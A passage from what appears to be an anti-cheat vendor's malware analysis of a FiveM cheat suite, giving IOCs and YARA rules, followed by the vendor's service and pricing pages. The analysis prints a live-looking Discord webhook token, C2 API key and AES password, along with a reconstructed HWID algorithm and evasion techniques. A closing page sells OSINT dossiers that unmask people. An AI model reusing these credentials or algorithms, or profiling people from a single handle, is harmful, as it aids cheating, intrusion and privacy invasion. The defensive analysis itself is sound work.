H0o1y5y0LvXLDlrni0TyGTAgTd48th0KISqy6WlUVp8Bv5BxKWXSfcQhreoPdq6nKwUF // Two log types sent to operator's Discord server: 1800897c8 "Access Log" — HWID check events (who ran the bypass and when) 18009c2a0 "Login Log" — successful/failed login events // webhookUrl is also returned dynamically by /api/ep/init, // allowing operators to rotate it server-side without a binary update. Background aurora shader — embedded HLSL source The MB.dll overlay menu renders a raymarched DirectX 11 aurora background in HLSL. The full shader source is embedded as a string constant in the binary. Dark grey base color (`0.04, 0.04, 0.04`). Developer commented it in Portuguese: "fundo cinza escuro" (dark grey background). crypt.exe — AES-CBC File Encryptor ---------------------------------- DEEP\_crypt.exe.txt / extract\_crypt.exe.txt `crypt.exe` is a standalone 64-bit utility (ImageBase `0x140000000`, `.text`: `0x6400` bytes) with no network functionality. Its only external imports are `BCRYPT.DLL` (11 BCrypt functions), `SHELL32.DLL` (drag-and-drop argument parsing via `CommandLineToArgvW`), `KERNEL32.DLL`, and `USER32.DLL` (`MessageBoxA` for the Portuguese error dialogs). The developer's intent was for operators to encrypt payloads before distribution and decrypt them on the target machine. In practice, the AES key is in plaintext in the binary (documented above), making the encryption security theater — anyone who has the binary can decrypt any Spotless payload. From fileextract\_crypt.exe.txt BCRYPT.DLL → BCryptOpenAlgorithmProvider BCRYPT.DLL → BCryptGenerateSymmetricKey BCRYPT.DLL → BCryptCreateHash BCRYPT.DLL → BCryptSetProperty BCRYPT.DLL → BCryptHashData BCRYPT.DLL → BCryptDestroyHash BCRYPT.DLL → BCryptCloseAlgorithmProvider BCRYPT.DLL → BCryptFinishHash BCRYPT.DLL → BCryptGenRandom BCRYPT.DLL → BCryptDecrypt BCRYPT.DLL → BCryptEncrypt BCRYPT.DLL → BCryptDestroyKey bufa.dll — Bypass Core & Driver Loader -------------------------------------- DECOMP\_bufa.dll.txt / DEEP\_bufa.dll.txt / extract\_bufa.dll.txt `bufa.dll` is the bypass operations layer (64-bit, ImageBase `0x180000000`, `.text`: `0x9e600` bytes). Its `.rdata` section contains the LLVM-MSVC compiler banner: `"Welcome to use llvm-msvc."`. It is the glue between usermode and the kernel driver — handling file-system manipulation, registry tampering, session detection, and embedded driver loading. PDB Artifact BFDriverLoader project — ETW hook driver loader PDB path in binary: `\etw_hook\outputs\x64\Release\BFDriverLoader.pdb`. The project name confirms bufa.dll incorporates an ETW-hook-capable driver loader component. Developer 3 handle "swift" — separate fivem-spoofer project PDB path: `C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb`. Third distinct developer/build identity after TZX and Gun. Stored in a `pastes` folder — code shared informally, not via version control. From fileDECOMP\_bufa.dll.txt / DEEP\_bufa.dll.txt / extract\_bufa.dll.txt // Developer 2 / payload lineage (Gun): 1800a4591 etw\_hookoutputsdReleaseBFDriverLoader.pdb C:UsersGunDesktopKCustomKernel-UI-Protected... // Developer 3 / driver-loader lineage (swift): 1800be878 C:UsersswiftDocumentspastes ivem-spooferspoofer-drvuildkernel\_hook.pdb // Compiler identity: 1800aeb10 "Welcome to use llvm-msvc." ← LLVM-MSVC linker banner // Secondary C2 user-agent: 1800aebce swft/1.0 ← swift marker reused as WinHTTP user-agent // FiveM target confirmation: "FiveM" ← appears directly in data section // Kernel API strings resolved at runtime (not statically imported): ZwQuerySystemInformation RtlImageNtHeader RtlImageDirectoryEntryToData MmGetSystemRoutineAddress IoCreateFileEx MmFlushImageSection ZwDeleteFile IoFileObjectType IofCompleteRequest IoCreateDevice PsCreateSystemThread ObReferenceObjectByHandle ntoskrnl.exe ← all resolved dynamically to avoid import-scan detection File system and registry operations →**File ops:** CreateHardLinkW, CreateSymbolicLinkW, CopyFileW — creates decoy copies and hard links to hide bypass files →**Enumeration:** FindFirstFileA/W, FindFirstFileExW, FindNextFileW — directory scanning for cleanup and artifact avoidance →**Registry:** RegOpenKeyExA, RegQueryValueExA, RegDeleteValueA, RegSetValueExA — modifies values that anti-cheat systems check →**ADVAPI32 crypto:** CryptAcquireContextA, CryptCreateHash, CryptEncrypt, CryptDecrypt — secondary encryption layer for runtime data →**Session detect:** WTSGetActiveConsoleSessionId — detects screenshare/remote sessions and adapts behavior →**Driver comms:** DeviceIoControl — sends IOCTL 0x222004 to \\Device\\VolCache (neguin.sys) v3.dll — Main Cheat Engine -------------------------- DEEP\_v3.dll.txt / extract\_v3.dll.txt `v3.dll` is the largest binary in the suite at 9.5 MB (`.text`: `0x2afe00` bytes, `.rdata`: `0x363000` bytes). PE timestamp: `May 29 2026 at 16:29:35` — this is a very recent build. It bundles DirectX 11 HLSL shaders, Dear ImGui 1.91.3 WIP (19121), Inter font v3.019, and a full FiveM cheat feature set. From fileDEEP\_v3.dll.txt 18055f468 "May 29 2026 16:29:35" ← PE compile timestamp 1802bf298 "Dear ImGui 1.91.3 WIP (19121)" ← UI framework version Cheat feature strings — ESP, radar, and bypass indicators From fileDEEP\_v3.dll.txt // Player ESP: 18055cf90 Show Players 18055cfa0 Show Deads 18055cfb0 Show Peds 18055cfc0 Visible Check##esp 18055d050 Enable Skeleton 18055d070 Enable Box 18055d080 Show Friends##color 18055d0a8 Enable Health 18055d0e8 Enable Armor 18055d128 Enable Name 18055d1a8 Enable Weapon 18055d220 Weapon Icon Size // Radar system: 18055d530 Enable Radar 18055d5a0 Radar Show Players 18055d698 Enable Radar##vis 18055d6b0 Enable Radar##invis 18055d710 Radar Show Players##vis // Arrow ESP: 18055d890 Arrows Show Players // Anti-detection bypass indicator: 18055cfe8 "Electron Bypass" ← explicitly targets FiveM's Electron-based AC // Map reference (GTA V location data for radar/ESP): 1805effd0 "FIB Building" ← Federal Investigation Bureau building DirectX 11 HLSL shader — embedded as string From fileDEEP\_v3.dll.txt // Full shader source is a string constant in v3.dll: cbuffer vertexBuffer : register(b0) { float4x4 ProjectionMatrix; }; struct VS\_INPUT { float2 pos : POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; }; PS\_INPUT main(VS\_INPUT input) { output.pos = mul(ProjectionMatrix, float4(input.pos.xy, 0.f, 1.f)); output.col = input.col; output.uv = input.uv; } // Pixel shader with texture sampling for overlay rendering A dedicated `.fptable` section (`0x200` bytes, RW) stores resolved CitizenFX function pointers at runtime — a standard FiveM cheat technique to intercept game functions without static import references. fulano.dll — Injector with FiveM Build Targeting ------------------------------------------------ DEEP\_fulano.dll.txt `fulano.dll` is the DLL injector (64-bit, ImageBase `0x180000000`, `.text`: `0x473a00` bytes — over 4.6 MB of code). The large code size comes from a statically-linked FreeType font rendering library (confirmed by font format strings and glyph processing data), plus D3D11 and D3DX11\_43 for overlay rendering. Build Coverage 16 FiveM process targets — 8 build versions × 2 process types. Spotless maintains explicit support strings for every major FiveM game build from 2802 through 3751. Both the CitizenFX wrapper (`GameProcess`) and the underlying GTA V process (`GTAProcess`) are targeted for each build, giving the injector code-execution in both processes simultaneously. From fileDEEP\_fulano.dll.txt 1806d14e0 FiveM\_b2802\_GameProcess.exe 1806d1550 FiveM\_b2802\_GTAProcess.exe 1806d1518 FiveM\_b2944\_GameProcess.exe 1806d15c0 FiveM\_b2944\_GTAProcess.exe 1806d1588 FiveM\_b3095\_GameProcess.exe 1806d1628 FiveM\_b3095\_GTAProcess.exe 1806d1660 FiveM\_b3323\_GameProcess.exe 1806d1700 FiveM\_b3323\_GTAProcess.exe 1806d16c8 FiveM\_b3407\_GameProcess.exe 1806d1770 FiveM\_b3407\_GTAProcess.exe 1806d1738 FiveM\_b3570\_GameProcess.exe 1806d17e0 FiveM\_b3570\_GTAProcess.exe 1806d17a8 FiveM\_b3751\_GameProcess.exe 1806d1828 FiveM\_b3751\_GTAProcess.exe 1806d15f8 FiveM\_GameProcess.exe 1806d1698 FiveM\_GTAProcess.exe 1806d3f38 "FiveM Duplicate" ← anti-duplication detection string 1806d48d8 "Spotless" ← self-identification Injection technique — file-backed mapping to avoid WriteProcessMemory detection →CreateToolhelp32Snapshot → Process32FirstW/NextW — enumerate all processes to find FiveM build match →Module32FirstW/NextW — enumerate loaded modules for injection base address →OpenProcess → VirtualAllocEx — allocate memory in target process →MapViewOfFile / CreateFileMappingA / UnmapViewOfFile — file-backed alternative to WriteProcessMemory →LoadLibraryA/W / GetProcAddress / FreeLibrary — standard DLL load and export resolution →SetFileAttributesA / DeleteFileA — cleanup staging files post-injection bananacomleite.exe — Main Loader ("banana with milk") ----------------------------------------------------- DEEP\_bananacomleite.exe.txt `bananacomleite.exe` — "banana com leite" means "banana with milk" in Brazilian Portuguese — is the main user-facing launcher and the largest binary in the suite at 19.7 MB (`.text`: `0x215800` bytes, `.data`: `0x15839c` bytes). It bundles a complete statically-linked libcurl stack and implements RSA public key certificate pinning to prevent TLS interception. The UI stack is Dear ImGui `1.92.3 WIP (19223)`, with `D:\Projets\TZX\TZX\` source paths and high-performance GPU exports `NvOptimusEnablement` / `AmdPowerXpressRequestHighPerformance`. TLS Pinning RSA public key pinned — MitM interception blocked by design. The launcher uses libcurl's `sha256//` fingerprint mechanism. Any TLS certificate presented by the C2 that doesn't match the pinned hash is rejected outright. Even redirecting DNS to a proxy server fails the TLS handshake unless the proxy presents the exact pinned certificate. From fileDEEP\_bananacomleite.exe.txt 140219100 sha256// 140219110 "public key hash: sha256//%s" ← log format for pin mismatch 140219130 ;sha256// ← multiple pins supported 1402190c0 -----BEGIN PUBLIC KEY----- ← embedded RSA public key start 1402190e0 -----END PUBLIC KEY----- // libcurl SSL configuration errors (confirms libcurl version and TLS support): 140219040 "Unrecognized parameter value passed via CURLOPT\_SSLVERSION" 140219080 "CURL\_SSLVERSION\_MAX incompatible with CURL\_SSLVERSION" // Full protocol support (all statically linked): HTTP/1.0, HTTP/1.1, HTTPS, SOCKS4, SOCKS4a, SOCKS5, SOCKS5h, proxy The launcher also performs full Windows certificate chain validation via CRYPT32: `CertGetCertificateChain`, `CertFreeCertificateChain`, `PFXImportCertStore`, `CertOpenStore`, `CertEnumCertificatesInStore`, `CryptQueryObject`, `CryptDecodeObjectEx`. A DirectX 11 rendering context is created via `D3D11CreateDevice` for the launcher UI, and DWM borderless window styling via `DwmSetWindowAttribute`. Launcher Targeting 28 FiveM process strings — broader than fulano.dll's 16-target injector map. `bananacomleite.exe` carries both `GameProcess` and `GTAProcess` names for builds `1604` through `3570`, plus generic FiveM process names. `fulano.dll` separately carries the later 2802–3751 injector map. From fileDEEP\_bananacomleite.exe.txt 1403c41a8 FiveM\_b1604\_GameProcess.exe 1403c4360 FiveM\_b1604\_GTAProcess.exe 1403c41c8 FiveM\_b2060\_GameProcess.exe 1403c4380 FiveM\_b2060\_GTAProcess.exe 1403c41e8 FiveM\_b2189\_GameProcess.exe 1403c43a0 FiveM\_b2189\_GTAProcess.exe 1403c4208 FiveM\_b2372\_GameProcess.exe 1403c43c0 FiveM\_b2372\_GTAProcess.exe 1403c4228 FiveM\_b2545\_GameProcess.exe 1403c43e0 FiveM\_b2545\_GTAProcess.exe 1403c4248 FiveM\_b2612\_GameProcess.exe 1403c4400 FiveM\_b2612\_GTAProcess.exe 1403c4268 FiveM\_b2699\_GameProcess.exe 1403c4420 FiveM\_b2699\_GTAProcess.exe 1403c4288 FiveM\_b2802\_GameProcess.exe 1403c4440 FiveM\_b2802\_GTAProcess.exe 1403c42a8 FiveM\_b2944\_GameProcess.exe 1403c4460 FiveM\_b2944\_GTAProcess.exe 1403c42c8 FiveM\_b3095\_GameProcess.exe 1403c4480 FiveM\_b3095\_GTAProcess.exe 1403c42e8 FiveM\_GameProcess.exe 1403c44a0 FiveM\_GTAProcess.exe 1403c4300 FiveM\_b3323\_GameProcess.exe 1403c44b8 FiveM\_b3323\_GTAProcess.exe 1403c4320 FiveM\_b3407\_GameProcess.exe 1403c44d8 FiveM\_b3407\_GTAProcess.exe 1403c4340 FiveM\_b3570\_GameProcess.exe 1403c44f8 FiveM\_b3570\_GTAProcess.exe CTM Loader DLLs — 1kCUGOZADO\_CTM.dll & kCUGOZADO\_CTM.dll ---------------------------------------------------------- DEEP\_1kCUGOZADO\_CTM.dll.txt / DEEP\_kCUGOZADO\_CTM.dll.txt Two nearly-identical CTM loader DLLs exist — same C2 configuration, same API key, same salt, same webhook, same ImGui version. The difference is a path variant (an `aaaa` subdirectory inserted in the build path) and version strings — `1kCUGOZADO_CTM.dll` is the older "Spotless External" build, `kCUGOZADO_CTM.dll` adds the "Spotless V3" identifier. The private string `SpotlessPriv2026` is present in `MB.dll`, not in these CTM exports. From fileDEEP\_1kCUGOZADO\_CTM.dll.txt / DEEP\_kCUGOZADO\_CTM.dll.txt // Identical in both CTM DLLs: http://93.127.141.9:5000 FTaC7sHRNwKbrMYR ← API key 470752974bfe5c36 ← salt /api/ep/hwid-whitelist-check discord.com/api/webhooks/1472751394154086491/H0o1y5... Dear ImGui 1.91.9 WIP (19186) // Developer path — note the "aaaa" subdirectory (different from MB.dll): // MB.dll path: C:UsersGunDesktopKCustomKernel-UI-Protectedextackendsimguiimgui.h // CTM DLL path (both variants): C:UsersGunDesktopaaaaKCustomKernel-UI-Protectedextackendsimguiimgui.h // Version distinction: 1kCUGOZADO\_CTM.dll → "Spotless External" (older build) kCUGOZADO\_CTM.dll → "Spotless External" + "Spotless V3" (latest) TZX Connection — Confirmed in Code ---------------------------------- DEEP\_MB.dll.txt / DEEP\_1kCUGOZADO\_CTM.dll.txt Cross-Project Link api.tzproject.com actively assembled and called in authentication functions across three binaries. This is not a dead string. `api.tzproject.com` is copied character-by-character from static string constants into local stack buffers and passed to HTTP request functions in the same code paths as the Spotless HWID and blacklist checks. Both the full subdomain and root domain are referenced as separate string constants used in distinct call sites. From fileDEEP\_MB.dll.txt / DEEP\_1kCUGOZADO\_CTM.dll.txt // String addresses in MB.dll .rdata: 18009c5b0 tzproject 18009c5c8 api.tzproject.com 18009c5f8 tzproject.com 18009c608 fulano.dll ← injector referenced immediately adjacent // Authentication function (CTM DLLs) — string assembled into stack buffer: \*(undefined8 \*)local\_158 = s\_api\_tzproject\_com\_18009c5c8.\_0\_8\_; \*(undefined8 \*)local\_158 = s\_api\_tzproject\_com\_1800e6860.\_0\_8\_; \*(undefined8 \*)local\_178 = s\_api\_tzproject\_com\_1800e88e0.\_0\_8\_; local\_118\[0\] = s\_tzproject\_com\_18009c5f8\[0\]; local\_118\[1\] = s\_tzproject\_com\_18009c5f8\[1\]; // ... (all qwords assembled from static string) local\_1c8\[0x10\] = s\_api\_tzproject\_com\_18009c5c8\[0x10\]; // Present in: MB.dll, 1kCUGOZADO\_CTM.dll, kCUGOZADO\_CTM.dll Three possible relationships: (1) **shared developer** — Gun or swift also contributes to TZX; (2) **backend licensing** — Spotless uses TZX's authentication backend as a white-labeled service; (3) **shared customer base** — subscriptions validated across both systems. The important correction is that `swift` is a third file-backed identity, not just an alias for Gun or TZX. See our [TZX detection report](https://clubhouseac.shop/research/tzx-fivem-detection) for full TZX IOCs. A machine with both Spotless and TZX artifacts is near-certain evidence of active bypass usage. Anti-Detection Mechanisms ------------------------- Kernel driver disguise Driver device is named \\Device\\VolCache to resemble Windows volume cache internals. Dynamic driver loading NtLoadDriver is resolved and called dynamically instead of appearing plainly in imports. ETW blinding Hooks KiSystemServiceRepeat, kills Circular Kernel Context Logger, and uses ZwTraceControl / ZwSetSystemInformation. Process protection ObRegisterCallbacks strips PROCESS\_VM\_READ, PROCESS\_VM\_WRITE, and PROCESS\_VM\_OPERATION from handles. Artifact hiding Filesystem hooks suppress Prefetch, WER ReportArchive, and Local CrashDumps paths. HWID spoofing core::virtualizer::run mutates hardware identifiers before checks read them. Trace cleaning core::cleaner::hardware\_cleaner removes registry and file traces linked to bans. Anti-recording NVIDIA ShadowPlay registry keys are checked before sensitive UI activity. Debug / hook detection Debugger checks and hook scans attempt to detect analysis and security tooling. Payload encryption DmcE magic, AES-CBC encrypted payloads, and high-entropy DLL packages. HWID Algorithm -------------- The recovered HWID path mixes obfuscated seed constants with the computer name, hashes the combined bytes with a djb2-style loop, then XORs the result with `0xa3b2c1d0`. MB.dll also collects drive identifiers through `\\.\PhysicalDrive%u` and references GUID `{557CF406-1A04-11D3-9A73-0000F81EF32E}`. Reconstructed HWID generation seed1 = b"#\`sOBMFpZM@wQFF" seed2 = b"0tUVQE\\\\D}QSXY^U" # XOR 0x10 = "DEFAULT MACHINE" base = bytes(seed1\[i\] ^ seed2\[i\] for i in range(len(seed1))) computer\_name = GetComputerNameA() combined = base + computer\_name.encode() hwid\_hash = 0 for c in combined: hwid\_hash = hwid\_hash \* 0x21 + c hwid = hwid\_hash ^ 0xa3b2c1d0 Encryption & Cryptography ------------------------- Payload Files DmcE + IV + ciphertext Encrypted payloads use a `DmcE` magic header, 16-byte IV, and AES-CBC ciphertext. High entropy and the header create a clean file-based detection path. crypt.exe AES password is in .rdata `ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS` and `DmcAuth-salt` are hardcoded. The KDF uses SHA-256 before generating the BCrypt AES key. C2 Runtime Legacy CryptAPI appears in bufa.dll `CryptDeriveKey`, `CryptHashData`, `CryptEncrypt`, and `CryptDecrypt` indicate a secondary AES or RC4-style runtime layer for JSON requests. Payload crypto format Algorithm: AES-256-CBC KDF: SHA-256 over password + DmcAuth-salt Password: ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS Salt: DmcAuth-salt File format: DmcE magic (4 bytes) + IV (16 bytes) + ciphertext Workflow: Drag payload onto Crypter.exe; encryption/decryption happens in place IOCTLs ------ 0x222004neguin.sys manual-map DLL injection into target FiveM process 0x80002000SYSTEM token theft: copies EPROCESS token from PID 4 into target EPROCESS offset 0x4B8 0x222414Enable filesystem hooks for artifact hiding 0x222418Disable filesystem hooks 0x220020Secondary driver operation in FUN\_14000474c 0x900A4bufa.dll usermode command send path 0x900A8bufa.dll usermode response receive path Detection Signatures -------------------- File-Based IOCs Filenamesneguin.sys, bufa.dll, bananacomleite.exe, kCUGOZADO.dll, 1kCUGOZADO.dll, MB.dll, crypt.exe, taskthow.exe MD5ec7409f6b4d8a65f32a2f15d89efc7c1 (crypt.exe) MD587ec3469742c973ddd2326a20cb62089 (v3.dll) MagicDmcE header on encrypted payloads Entropy~8.0 on encrypted kCUGOZADO payloads Behavioral IOCs Driver LoadUnsigned driver exposing \\\\Device\\\\VolCache / \\\\DosDevices\\\\VolCache ETWCircular Kernel Context Logger killed or suppressed Pool TagsMyTg (0x6754794d), MyTx (0x7854794d) Token TheftNon-Discord process reads Discord LevelDB .ldb files Network Comboapi.ipify.org followed by discord.com/api/webhooks YARA Rules ---------- These are compact, high-signal rules derived from the strings and structure recovered in the analysis exports. Use them as a starting point and tune conditions against local false-positive baselines. Spotless detection YARA set rule neguin\_sys\_kernel\_driver { meta: description = "Detects neguin.sys FiveM cheat kernel driver" date = "2026-06" strings: $s1 = "Injection Complete. Process" ascii $s2 = "IOCTL: Manual Map initiated" ascii $s3 = "EtwHookManager" ascii $s4 = "\\\\Device\\\\VolCache" wide $s5 = "\\\\DosDevices\\\\VolCache" wide $s6 = "CheckProtectedOperation" ascii $s7 = "teste.exe" ascii $s8 = "netcom.dll" wide condition: uint16(0) == 0x5A4D and 5 of them } rule bufa\_dll\_loader { strings: $ua = "swft/1.0" ascii $ct = "Content-Type: application/json" ascii $v1 = "virtualizer" ascii wide $v2 = "hardware\_cleaner" ascii wide $v3 = "BFDriverLoader" ascii condition: uint16(0) == 0x5A4D and 2 of them } rule spotless\_auth\_payload { strings: $c2 = "http://93.127.141.9:5000" ascii $api = "FTaC7sHRNwKbrMYR" ascii $wh = "1472751394154086491" ascii $ban = "BANNED" ascii $mb\_priv = "SpotlessPriv2026" ascii $s2 = "Spotless External" ascii $s3 = "HWID security check failed" ascii $s4 = "NtRaiseHardError" ascii $s5 = "Loader-Protected/1.0" ascii $ldb = "\\\\discord\\\\Local Storage\\\\leveldb" ascii condition: uint16(0) == 0x5A4D and 3 of them } rule crypt\_exe\_payload\_encryptor { strings: $pw = "ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS" ascii $salt = "DmcAuth-salt" ascii $pt = "Arquivo criptografado com sucesso" ascii wide $pt2 = "descriptografado" ascii wide condition: uint16(0) == 0x5A4D and 2 of them } rule dmcauth\_encrypted\_payload { strings: $magic = { 44 6D 63 45 } condition: $magic at 0 and filesize > 1MB and math.entropy(0, filesize) > 7.8 } IOC Master Table ---------------- C2 API Serverhttp://93.127.141.9:5000 File Serverhttp://93.127.141.9:8080/ (open, no auth) HWID Endpoint/api/ep/hwid-whitelist-check?listType= Init Endpoint/api/ep/init → returns sessionid, expiry, webhookUrl Blacklist Check/api/blacklist/check Register/api/ep/register Keys/api/keys/use TZX Domainsapi.tzproject.com / tzproject.com Discord Webhookdiscord.com/api/webhooks/1472751394154086491/H0o1y5y0LvXLDlrni0TyGTAgTd48th0KISqy6WlUVp8Bv5BxKWXSfcQhreoPdq6nKwUF External IP Checkapi.ipify.org/?format=json API KeyFTaC7sHRNwKbrMYR API Salt470752974bfe5c36 MB Private StringSpotlessPriv2026 C2 Identifier0026d7bf AES KeyghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS (32 bytes, .rdata @ 0x140008718) KDF SaltDmcAuth-salt (SHA-256 → AES-CBC) User-Agent (API)Loader-Protected/1.0 User-Agent (swift)swft/1.0 Kernel Device\\Device\\VolCache → \\DosDevices\\VolCache IOCTL Code0x222004 (manual DLL map) Injected DLLnetcom.dll (manual-mapped by neguin.sys) Pool Tags0x6754794d (MyTg) · 0x7854794d (MyTx) Developer (Gun)C:\\Users\\Gun\\Desktop\\KCustom\\Kernel-UI-Protected Developer (Gun alt)C:\\Users\\Gun\\Desktop\\aaaa\\KCustom\\Kernel-UI-Protected Developer (swift)C:\\Users\\swift\\Documents\\pastes\\fivem-spoofer\\spoofer-drv\\build\\kernel\_hook.pdb Hollowing TargetC:\\Windows\\System32\\dllhost.exe Hollowing Fallbackchrome.exe / RuntimeBroker.exe / msedgewebview2.exe Token Theft Paths%APPDATA%\\discord\\Local Storage\\leveldb\\\*.ldb (all 3 variants) HWID GUID{557CF406-1A04-11D3-9A73-0000F81EF32E} BSOD Error Code0xc0000420 (STATUS\_ASSERTION\_FAILURE) via NtRaiseHardError UI FrameworkDear ImGui 1.92.3 WIP (launcher), 1.91.9 WIP (CTM), 1.91.3 WIP (v3) Build DateMay 29 2026 16:29:35 (v3.dll PE timestamp) Release Date20.02.2026 (MB.dll data section) FiveM BuildsLauncher: 1604-3570 + generic; fulano.dll: 2802-3751 + generic (GameProcess + GTAProcess) --- # Clubhouse AC — Forensic PC Scanning for Game Servers [](https://clubhouseac.shop/) Check User ========== Global cheating database scan [Sign In](https://clubhouseac.shop/login) [Get Full Access](https://clubhouseac.shop/#pricing) Check User Right-click a Discord user → Copy User ID (requires Developer Mode) ### Ready to Scan Enter a Discord ID above to check against global cheating databases — GTA V, Minecraft, and suspicious message history. GTA V, Minecraft & message intelligence powered by [CheaterStats](https://cheaterstats.cc/) . 3 Databases All Games Message History Secure & Private --- # Clubhouse AC — Forensic PC Scanning for Game Servers Secure download Download Scanner ================ Enter the PIN provided by your server staff Scanner Capabilities -------------------- ### Kernel Analysis Deep driver & kernel integrity checks ### File Forensics USN Journal, MFT, and artifact analysis ### Memory Scanning Process memory and injection detection ### Network Traces DNS cache, ARP table, connection analysis ### HWID Verification Hardware ID spoofer detection ### Behavioral Analysis Pattern and anomaly detection 40+ Scan Modules 1800+ Detection Rules Enter PIN Your server staff will give you a 6-character PIN (letters and numbers) Verify How it works: 1. 1 Your server staff generates a PIN for you 2. 2 Enter the PIN above to verify your identity 3. 3 Download and run the scanner 4. 4 Results are sent to your server staff --- # Clubhouse AC — Forensic PC Scanning for Game Servers [Back to homepage](https://clubhouseac.shop/) Server Network Build your enterprise quote =========================== Pick your slot tier, the games you cover, and the add-ons you need. The total updates as you go. When you're ready, download the invoice and paste it into a Discord ticket — our team will reach out within a business day. Step 1 Operator seats -------------- How many staff will run scans? One slot per person. 5 slots 5 × $15/slot = $75/mo or type 1255075100+ 1\+ slots · $15/slot10\+ slots · $13/slot25\+ slots · $11/slot50\+ slots · $9/slot Step 2 Game coverage ------------- Pick a pack, then choose which games to cover. 1 game included 3 games +$30/mo 6 games +$70/mo All 12 games +$120/mo Pick up to **3** games (3 selected). FiveM / GTA VRustRainbow Six SiegeFortniteMinecraftRobloxValorantCSGOEscape from TarkovHytaleGarry's ModArc Raiders Step 3 Add-ons ------- Toggle anything you want layered on. All optional. Clubhouse AI verdicts on every detection Per-detection real / false-positive / uncertain calls +$40/mo AI chat assistant — full scan context Operators can question findings inline +$25/mo Hybrid Analysis threat-intel lookups Live sample reputation on every flagged binary +$30/mo VirusTotal hash scanning AV-engine consensus on every hash flagged +$25/mo API access + webhooks Push scans + pull verdicts from your own tooling +$20/mo Priority 24/7 support Same-day response, escalation path +$30/mo Custom branding / white-label Your logo on operator dashboard + exports +$15/mo Multi-server license (3 extra servers) License covers 1 server by default — add more here +$15/mo Dedicated success engineer Quarterly review, custom signature curation +$100/mo --- # Reverse Engineering Services · Clubhouse AC Clubhouse AC · Reverse Engineering We take it apart so you know exactly what it does. ================================================== Send us a cheat, loader, injector, or FiveM bypass. A team of reverse engineers takes the target apart in parallel and hands you a documented report from every analyst — complete with decompiled code, behaviour, indicators, and ready-to-deploy detections. [Submit a sample](https://clubhouseac.shop/reverse-engineering#submit) [See pricing](https://clubhouseac.shop/reverse-engineering#pricing) Multiple analysts per target A report from each engineer Samples never executed A team, not a black box Every target gets more than one set of eyes ------------------------------------------- We don't hand your sample to a single analyst and hope for the best. A group of reverse engineers works it in parallel, and you receive an individual report from each one documenting their findings — with decompiled code reconstructed as far as the binary allows. 01 ### You submit the sample Upload the cheat, loader, or FiveM bypass and tell us what you already know. The file is handled as inert data and never executed on our infrastructure. 02 ### A team picks it up — not one person Your target is assigned to multiple reverse engineers who work it in parallel. Each analyst attacks it from a different angle: static analysis, dynamic behaviour, packer/protector defeat, and network/IPC. 03 ### You get a report from each analyst Every engineer hands back their own written report documenting what they found — annotated findings, indicators, and decompiled / reconstructed source code recovered as far as the protections allow. 04 ### Turn it into detections We translate the teardown into actionable signatures, behavioural indicators, and YARA-style rules you can act on — so the same sample never slips past you again. What we recover Deep, documented analysis ------------------------- ### Decompilation Recovered pseudocode and reconstructed source — as much as the binary and its protections allow. ### Unpacking & deobfuscation Defeat VMProtect, Themida, and custom packers to reach the real logic underneath. ### Kernel & DMA tooling Driver analysis, BYOVD chains, and PCIe/DMA device behaviour breakdowns. ### Behavioural analysis What the sample touches: files, registry, memory, hooks, and injection technique. ### Indicators & attribution Hashes, strings, C2 endpoints, and developer fingerprints tied back to known ecosystems. ### Detection engineering Findings converted into signatures and rules you can deploy immediately. Pricing Straightforward, fairly priced ------------------------------ No retainers required to get started. Pay per file, or step up to a full multi-analyst teardown when you need the complete picture. ### Single File Triage Fast turnaround on one sample. $49per file * 1 file fully reviewed * One analyst report * Static + behavioural overview * Key strings, hashes & IOCs * 48–72h turnaround [Get started](https://clubhouseac.shop/reverse-engineering#submit) Most popular ### Full Teardown The complete multi-analyst breakdown. $149per target * Multiple reverse engineers in parallel * A written report from each analyst * Decompiled / reconstructed source as far as possible * Unpacking & deobfuscation * Full IOC set + attribution * Detection signatures & rules included * Priority turnaround [Get started](https://clubhouseac.shop/reverse-engineering#submit) ### Retainer For servers & networks under constant pressure. Custommonthly * Ongoing sample intake * Dedicated analyst team * Bulk & rush handling * Standing detection pipeline * Direct line to the team [Contact us](https://clubhouseac.shop/reverse-engineering#submit) Submit a sample Send it in ---------- Tell us what kind of file it is and what you already know. The more context you give our analysts, the deeper the teardown. Your file is relayed to the team as inert data and is never run on our servers. * FiveM bypass or any game cheat * Reviewed by multiple reverse engineers * A documented report from each analyst * We contact you with a payment request before work starts What kind of file is it? FiveM bypass Spoofer, cleaner, or screenshare bypass. Cheat Loader, injector, menu, or DMA tooling. Something else Any other file or software to analyse. What do you already know about it? How should we reach you with the reports? \* The fileChoose a fileSingle file, no size limit **Payment first.** After you submit, our team reviews the target and contacts you with a payment request — expect to hear from us before any analysis begins. Your sample uploads straight to private storage and is handled as inert data — it is **never executed** on our servers. Submit for analysis Submissions are private and reviewed only by our analysts. --- # Background Checks & OSINT · Clubhouse AC Clubhouse AC · Background Checks & OSINT Find out who someone really is. =============================== Open-source background checks on people. Give us a lead — a username, email, phone number, or profile — and we pull together as much public information on that person as we can: real identity, linked accounts, photos, location, and history, all in one documented report. [Start a background check](https://clubhouseac.shop/osint#request) [See pricing](https://clubhouseac.shop/osint#pricing) You give the lead, we do the digging Documented, sourced reports Public sources only What we pull together As much on a person as we can find ---------------------------------- ### Real identity Names, aliases, and the real person behind an online handle — pieced together from public sources. ### Accounts & contacts Linked emails, usernames, phone numbers, and profiles across platforms. ### Connected accounts Alt accounts and the wider network tied to the same person. ### Photos & profiles Public images and profile pages that confirm who you're looking at. ### Location & region City, region, timezone, and activity-window clues from public data. ### Exposure & history Public breach exposure, past handles, and online history we can surface. How it works From one lead to a full picture ------------------------------- We can't start from nothing — give us a single identifier and we'll build out everything we can around it. 01 ### You give us a lead A username, email, phone number, Discord ID, or profile link — anything that identifies the person. We can't start without one. 02 ### We dig through open sources We pull from publicly available data across platforms, archives, and public records to gather as much as possible. 03 ### Correlate & verify Everything is cross-checked and corroborated so the picture is the right person — not someone who just shares a name. 04 ### You get the full report A clear dossier: everything we found on the person, with confidence levels, sources, and supporting evidence. Pricing Clear pricing, real answers --------------------------- Start with a basic check or commission a full background report. Every tier ships a documented dossier with sources and confidence ratings. ### Basic Check A focused look from a single lead. $29per person * 1 person from your lead * Identity & alias correlation * Linked accounts & contacts surfaced * Summary report with sources * 48h turnaround [Get started](https://clubhouseac.shop/osint#request) Most popular ### Full Background Check Everything we 